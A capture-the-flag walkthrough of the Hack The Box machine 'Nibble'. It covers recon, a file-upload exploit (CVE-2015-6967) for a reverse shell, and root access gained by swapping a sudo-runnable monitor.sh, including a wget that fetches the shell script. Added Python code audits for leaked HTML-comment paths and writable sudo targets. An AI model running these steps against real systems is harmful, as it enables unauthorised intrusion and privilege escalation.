HTB: Nibble Writeup w/o Metasploit
Recon
I kicked off my usual set of nmap scans (nmap jutsu): a full port scan, a version scan, a vulnerability-script scan, and a few quick scans. These revealed 2 open ports, port 80 and port 22.

Let us poke around the web page on port 80 first. After navigating to the site, we do not see anything useful at first glance. Viewing the page source, however, reveals a directory (/nibbleblog/) mentioned in an HTML comment.
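The foothold on this box starts with a path left in an HTML comment, so here is an added example (my own code, not from the original writeup) of the check a site owner can run over their own pages to catch that kind of leak before a scan does: it collects every HTML comment and flags the ones containing path-like tokens or absolute URLs. The SAMPLE_HTML is constructed for the demonstration.

```python
"""Find HTML comments that leak filesystem or URL paths.

Added example for this writeup (not part of the original post). SAMPLE_HTML
below is constructed; run find_leaked_paths() over your own page sources.
"""
import re
from html.parser import HTMLParser

# Path-like tokens: an absolute http(s) URL, or a "/"-rooted path such as
# /nibbleblog/ or /admin/login.php (the lookbehind avoids matching inside
# words like "and/or" or version strings like "1.2/3").
PATH_RE = re.compile(r"(?:https?://[^\s\"'<>]+|(?<![\w.])/[\w.\-]+(?:/[\w.\-]*)*)")


class CommentCollector(HTMLParser):
    """Collects every HTML comment together with the line it starts on."""

    def __init__(self):
        super().__init__()
        self.comments = []

    def handle_comment(self, data):
        line, _col = self.getpos()  # position of the "<!--" that opened this comment
        self.comments.append((line, data.strip()))


def find_leaked_paths(html):
    """Return [{'line', 'comment', 'paths'}] for each comment that mentions a path."""
    parser = CommentCollector()
    parser.feed(html)
    parser.close()
    findings = []
    for line, text in parser.comments:
        paths = PATH_RE.findall(text)
        if paths:
            findings.append({"line": line, "comment": text, "paths": paths})
    return findings


# Constructed sample page: one comment leaking a directory, one leaking an
# internal URL, and one harmless TODO that must not be reported.
SAMPLE_HTML = """<!DOCTYPE html>
<html>
<head><title>Hello world!</title></head>
<body>
<b>Hello world!</b>
<!-- /nibbleblog/ directory. nothing interesting here! -->
<!-- old admin at http://intranet.example/admin.php -->
<!-- TODO: fix footer alignment -->
</body>
</html>"""

if __name__ == "__main__":
    for f in find_leaked_paths(SAMPLE_HTML):
        print(f"line {f['line']}: {f['paths']} in comment {f['comment']!r}")
```

Run it against saved page sources (for example the output of a crawl of your own site) and review every hit; a commented-out path is as visible to anyone who views the source as it is to this script, so the fix is to remove the comment from the deployed template, not merely to rename the directory.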

Enumeration
Before visiting the URL, I launched a gobuster scan against that directory (10.10.10.75/nibbleblog), and a nikto scan alongside it in case gobuster missed something. The scans against 10.10.10.75/nibbleblog turned up a number of other files and directories. We could go through them one by one, but that could easily lead down several rabbit holes, so before doing that I checked the gobuster and nikto output to see whether anything stood out. The results were interesting.

The /nibbleblog/admin.php and /nibbleblog/install.php pages were especially useful. admin.php was a login screen. install.php led me to another page (updates.php) which showed the web app's (nibble) version number.

I used Google to look for exploits for this app and version. CVE-2015-6967 was the exploit I used to get a shell. The exploit uploads a file (our reverse shell) and executes it for us. It took me a while to find a payload that actually worked: some of them I had to make compatible with Python 3, but this one here I was able to use as is. It also provided the credentials needed for the exploit to work.

I was curious though: "If this exploit didn't provide the credentials, how would I have found the credentials for the exploit to work?" I googled "nibble default credentials" and found several docs and blog posts listing the password I used in the exploit, along with a few others. Curiosity satisfied.
Privilege Escalation
Time to get root access. I ran a few commands to get a better understanding of where (pwd) and who (whoami) I am on the box, then checked whether I could run sudo (sudo -l). The output of sudo -l shows we can run /home/nibbler/personal/stuff/monitor.sh as root.

Since I can run this as root, I swapped out the file with one of my own. First I had to unzip the archive, because monitor.sh is inside a zipped file ("unzip personal"). Then I created a reverse shell using the first bash TCP reverse shell here and renamed it to "monitor.sh". Afterwards, I spun up a web server (python3 -m http.server 80) to host my "monitor.sh" file and retrieved it on the compromised box by running "wget http://10.10.10.75/monitor.sh" from the nibbler box.

All I had to do now was execute the script with sudo to get a shell with root access.
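The root shell here comes down to one sudo rule: root may run a script that sits in the runner's own home directory, so the runner can replace it. As an added example (my own code, not part of the original writeup), here is an audit that parses sudoers-style rule lines (or `sudo -l` output lines, given a default user) and, using owner and mode metadata for each command path and its parent directory, reports every rule whose target the runner could rewrite. SAMPLE_RULES and SAMPLE_FS are constructed, modelled on the rule seen on this box; stat_paths() builds the same metadata map from a live host.

```python
"""Audit sudo rules for command targets the runner can rewrite.

Added example for this writeup (not part of the original post). SAMPLE_RULES
and SAMPLE_FS are constructed test data; use stat_paths() for real checks.
"""
import os
import posixpath
import pwd
import re
import stat

RULE_RE = re.compile(
    r"^(?:(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*)?"  # "user HOST=" prefix (absent in sudo -l output)
    r"\((?P<runas>[^)]+)\)\s*"                      # "(root)", "(ALL : ALL)"
    r"(?P<tags>(?:[A-Z]+:\s*)*)"                    # NOPASSWD: SETENV: ...
    r"(?P<cmds>.+)$"                                # comma-separated command specs
)


def parse_rule(line, default_user=None):
    """Return {'user','runas','nopasswd','cmds'} or None for non-rule lines."""
    m = RULE_RE.match(line.strip())
    if not m:
        return None
    user = m.group("user") or default_user
    if user is None:
        return None
    # Keep only the executable of each command spec; arguments do not change who owns it.
    cmds = [spec.strip().split()[0] for spec in m.group("cmds").split(",") if spec.strip()]
    return {"user": user, "runas": m.group("runas").strip(),
            "nopasswd": "NOPASSWD:" in m.group("tags"), "cmds": cmds}


def replace_reasons(user, path, fs):
    """Why `user` could alter what runs at `path`; fs maps path -> (owner, st_mode)."""
    if path == "ALL":
        return ["any command allowed"]
    reasons = []
    meta = fs.get(path)
    if meta is None:
        reasons.append("target does not exist")
    else:
        owner, mode = meta
        if owner == user:
            reasons.append("file owned by runner")
        elif mode & stat.S_IWOTH:
            reasons.append("file world-writable")
    # A writable parent directory lets the runner delete and recreate the file,
    # unless the sticky bit restricts deletion to the file's owner.
    pmeta = fs.get(posixpath.dirname(path))
    if pmeta:
        powner, pmode = pmeta
        if powner == user:
            reasons.append("parent directory owned by runner")
        elif pmode & stat.S_IWOTH and not pmode & stat.S_ISVTX:
            reasons.append("parent directory world-writable")
    return reasons


def audit_sudo_rules(lines, fs, default_user=None):
    """Return one finding per (rule, command) where the runner controls the command."""
    findings = []
    for line in lines:
        rule = parse_rule(line, default_user)
        if rule is None:
            continue
        for cmd in rule["cmds"]:
            reasons = replace_reasons(rule["user"], cmd, fs)
            if reasons:
                findings.append({"user": rule["user"], "runas": rule["runas"], "cmd": cmd,
                                 "nopasswd": rule["nopasswd"], "reasons": reasons})
    return findings


def stat_paths(paths):
    """Build the {path: (owner, st_mode)} map from the live filesystem (Unix only)."""
    fs = {}
    for p in set(paths) | {posixpath.dirname(p) for p in paths}:
        try:
            st = os.stat(p)
        except OSError:
            continue  # missing targets are reported by replace_reasons()
        fs[p] = (pwd.getpwuid(st.st_uid).pw_name, st.st_mode)
    return fs


# Constructed sample: the first rule mirrors the one on this box; the second is
# a safe root-owned script; the third is root-owned but sits in a world-writable dir.
SAMPLE_RULES = [
    "nibbler ALL=(root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh",
    "backup ALL=(root) NOPASSWD: /usr/local/bin/backup.sh",
    "deploy ALL=(root) /opt/deploy/restart.sh",
]
SAMPLE_FS = {
    "/home/nibbler/personal/stuff": ("nibbler", 0o40755),
    "/home/nibbler/personal/stuff/monitor.sh": ("nibbler", 0o100755),
    "/usr/local/bin": ("root", 0o40755),
    "/usr/local/bin/backup.sh": ("root", 0o100755),
    "/opt/deploy": ("root", 0o40777),
    "/opt/deploy/restart.sh": ("root", 0o100755),
}

if __name__ == "__main__":
    for f in audit_sudo_rules(SAMPLE_RULES, SAMPLE_FS):
        flag = "NOPASSWD " if f["nopasswd"] else ""
        print(f"{f['user']} -> ({f['runas']}) {flag}{f['cmd']}: {', '.join(f['reasons'])}")
```

On a real host, feed it the rule lines from /etc/sudoers and /etc/sudoers.d (or the lines of `sudo -l` output with default_user set to the account being reviewed) together with `stat_paths()` over the command paths. The fix for a finding is the one missing on this box: keep anything sudo runs as root under a root-owned, non-writable directory such as /usr/local/sbin, owned by root with mode 755.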


Conclusion
This was not a difficult box to get through. It would have taken much longer if I had gone through every one of the other directories I found under /nibbleblog/. The hardest part for me was finding the right exploit: the first few I tried did not work at all, and I spent some time troubleshooting them before I started looking for others on GitHub. Other than that, we gained our initial foothold because the /nibbleblog/ directory was left in the page source.
That led us to the version of nibble in use, which in turn led to the exploit we used to get our first shell. From there we found that the nibbler user could run a monitor.sh script with sudo, swapped the file out for our reverse shell, and caught a privileged shell.
Thanks for reading my writeup!